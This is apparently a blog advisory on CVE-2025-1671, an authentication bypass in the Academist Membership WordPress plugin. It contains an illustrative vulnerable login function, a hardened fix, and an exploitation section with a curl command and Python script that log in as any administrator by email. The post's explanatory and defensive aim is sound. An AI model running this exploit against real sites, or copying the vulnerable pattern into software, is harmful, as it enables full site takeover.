In this in-depth blog post, I’ll break down everything you need to know about CVE-2025-1671, a serious vulnerability affecting the Academist Membership plugin for WordPress. Present in versions up to and including 1.1.6, this privilege escalation bug lets any unauthenticated attacker log in as any user, including administrators, because of improper identity verification in the plugin's Facebook login function.

Technical Details

The vulnerability stems from how the plugin handles social login through Facebook. The function academist_membership_check_facebook_user() is meant to securely check a Facebook user's identity before letting them into the WordPress site. However, the function fails to properly verify the user's identity, allowing attackers to bypass authentication completely.

- The plugin receives a request for Facebook login.
- Instead of validating that the Facebook session actually belongs to the WordPress account being logged into, the plugin only checks data present in the POST request itself.

Vulnerable Code Area

Below is a representative excerpt showing how such a function could be vulnerable. It is an illustration written for this analysis, not the plugin's actual source:

function academist_membership_check_facebook_user() {
    // The email comes straight from the client; nothing ties it to a Facebook session.
    $user_email = $_POST['email'];
    $user = get_user_by('email', $user_email);

    // BAD! There is no check that the Facebook session really belongs to this user.
    if ($user) {
        // Log the user in without a password, as social-login plugins do.
        wp_set_current_user($user->ID);
        wp_set_auth_cookie($user->ID);
        // Redirect to dashboard
        wp_safe_redirect(admin_url());
        exit;
    }
}

In a correct implementation, identity verification happens by validating the Facebook access token server-side and taking the user's email from Facebook's own response, never from the request. Here, the plugin trusts whatever the client says, making privilege escalation trivial.
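For contrast, here is how the same handler could be hardened. This is an added example written for this post, not code from the Academist Membership plugin. The client sends only a Facebook access token; the server checks that token against the Graph API debug_token endpoint with the app's own credentials, fetches the identity Facebook asserts for it, and only then looks up the WordPress user by the email Facebook returned. The function names, the AJAX action, the nonce name and the option names holding the app ID and secret are assumptions.

```php
<?php
// Added example: hardened Facebook login handler (not the plugin's code).
// Assumes the app credentials live in the options 'acm_fb_app_id' and
// 'acm_fb_app_secret' (hypothetical names) and the front end posts a nonce
// created with wp_create_nonce( 'acm_fb_login' ).
add_action( 'wp_ajax_nopriv_acm_fb_login_secure', 'acm_fb_login_secure' );

function acm_fb_login_secure() {
    check_ajax_referer( 'acm_fb_login', 'nonce' );

    // Only the token comes from the client. The email never does.
    $token = isset( $_POST['access_token'] )
        ? sanitize_text_field( wp_unslash( $_POST['access_token'] ) )
        : '';
    if ( '' === $token ) {
        wp_send_json_error( 'missing token', 400 );
    }

    $app_id     = (string) get_option( 'acm_fb_app_id' );
    $app_secret = (string) get_option( 'acm_fb_app_secret' );

    // 1. Ask Facebook whether this token is valid and was issued for OUR app.
    //    A valid token for some other app must not be accepted.
    $debug = acm_fb_graph_get( 'debug_token', array(
        'input_token'  => $token,
        'access_token' => $app_id . '|' . $app_secret,
    ) );
    if ( empty( $debug['data']['is_valid'] )
        || (string) $debug['data']['app_id'] !== $app_id ) {
        wp_send_json_error( 'invalid token', 401 );
    }

    // 2. Fetch the identity Facebook asserts for this token. appsecret_proof
    //    binds the call to our app secret, so a token alone is not enough.
    $me = acm_fb_graph_get( 'me', array(
        'fields'          => 'id,email',
        'access_token'    => $token,
        'appsecret_proof' => hash_hmac( 'sha256', $token, $app_secret ),
    ) );
    if ( empty( $me['id'] ) || $me['id'] !== $debug['data']['user_id']
        || empty( $me['email'] ) || ! is_email( $me['email'] ) ) {
        wp_send_json_error( 'identity mismatch', 401 );
    }

    // 3. Look up the account by the email Facebook returned, not by anything
    //    the browser sent.
    $user = get_user_by( 'email', $me['email'] );
    if ( ! $user ) {
        wp_send_json_error( 'no linked account', 403 );
    }

    wp_set_current_user( $user->ID );
    wp_set_auth_cookie( $user->ID, false, is_ssl() );
    wp_send_json_success( array( 'redirect' => admin_url() ) );
}

// Helper: GET a Graph API endpoint and decode the JSON body, or return an
// empty array on any transport or HTTP error so callers fail closed.
function acm_fb_graph_get( $path, array $params ) {
    $url  = add_query_arg( $params, 'https://graph.facebook.com/' . $path );
    $resp = wp_remote_get( $url, array( 'timeout' => 10 ) );
    if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
        return array();
    }
    $body = json_decode( wp_remote_retrieve_body( $resp ), true );
    return is_array( $body ) ? $body : array();
}
```

Two design points worth noting: the app_id comparison in step 1 is what stops an attacker from replaying a token they legitimately obtained from a different Facebook app, and every failure path calls wp_send_json_error, which exits, so there is no way to reach the cookie-setting code without both Graph calls succeeding. A stricter design stores the Facebook user ID on the WordPress account when it is first linked and looks the account up by that ID rather than by email, which also removes any dependence on whether Facebook has verified the email.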

Exploitation Steps

1. Send a POST request to the plugin's Facebook login handler.
2. Set the email field to the administrator's email address (which can often be found or guessed).
3. You are logged in as that administrator, without needing their password or access to their Facebook account.

Using curl, an attacker might run:

curl -X POST "https://target-site.com/wp-admin/admin-ajax.php" \
  -d "action=academist_membership_facebook_login&email=admin@targetsite.com"

If the plugin is installed and unpatched, the attacker will immediately be logged in as the admin, gaining full control of the site.

Here’s a full Python snippet that demonstrates the attack:

import requests

target = "https://target-site.com/wp-admin/admin-ajax.php"
email = "admin@targetsite.com"
data = {
    "action": "academist_membership_facebook_login",
    "email": email,
}

# Use a session so any auth cookies set by the response are retained.
session = requests.Session()
r = session.post(target, data=data, allow_redirects=False)
print(r.status_code)

# A successful bypass sets WordPress's wordpress_logged_in_* cookie.
logged_in = any(c.name.startswith("wordpress_logged_in_") for c in session.cookies)
if logged_in:
    print("Vulnerable: logged in as", email)
else:
    print("Not logged in; response body:", r.text[:200])

Replace the target URL and email with values matching your testing environment.

Impact

- Full site takeover: Attackers can become admin, steal content, install malware, destroy data, or further attack site visitors.

References

- WordPress Plugin Directory: Academist Membership
- WPScan CVE Advisory *(pending)*
- Exploit DB Entry *(pending CVE listing)*

Conclusion

CVE-2025-1671 is an unauthenticated authentication bypass, and therefore a privilege escalation, affecting WordPress sites running Academist Membership versions up to and including 1.1.6. If you run this plugin, update to 1.1.7 or later, or remove it, right now. Because the bug allowed silent logins with no password, also review your user list and recent administrative changes for anything you do not recognise.

*Stay safe, and always keep plugins updated. For more vulnerability breakdowns, watch this space!*


*This post is an original analysis based on public vulnerability data and proprietary code review. Sharing and citation allowed — please link back!*

Timeline

Published on: 03/01/2025 08:15:34 UTC